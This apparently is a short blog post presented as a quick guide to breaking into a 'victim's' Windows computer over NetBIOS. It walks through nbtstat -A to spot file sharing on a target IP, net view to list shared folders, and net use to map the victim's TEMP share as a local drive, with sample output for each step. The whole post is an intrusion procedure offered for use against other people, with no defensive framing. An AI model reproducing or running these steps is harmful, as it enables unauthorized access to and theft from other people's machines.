If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.
This is how : -
Click "Start -> Run -> cmd"
Type the following at the Dos Prompt
Code:
Nbtstat -A
[e.g: nbtstat -A 207.175.1.1]
This will give you a read out that looks like this
Code:
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
____________________________________
The numbers in the <> are hex code values. What we are
interested in is the “Hex Code- number of <20>.
A hex code of <20> means you have file and printer sharing turned on.
Next step is to find out what is being shared. This is how : -
Code:
Net view \\
[e.g : net view \\207.175.1.1]
You will then get a response that looks something like this.
Code:
Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________
(The command was completed successfully.)
Code:
Net use x: \\
[e.g : net use x: \\207.175.1.1\temp]
If all goes well for you, you will then get a response of
Code:
(The command was completed successfully.)
Open my computer you will see your victim's temp folder there
No comments:
Post a Comment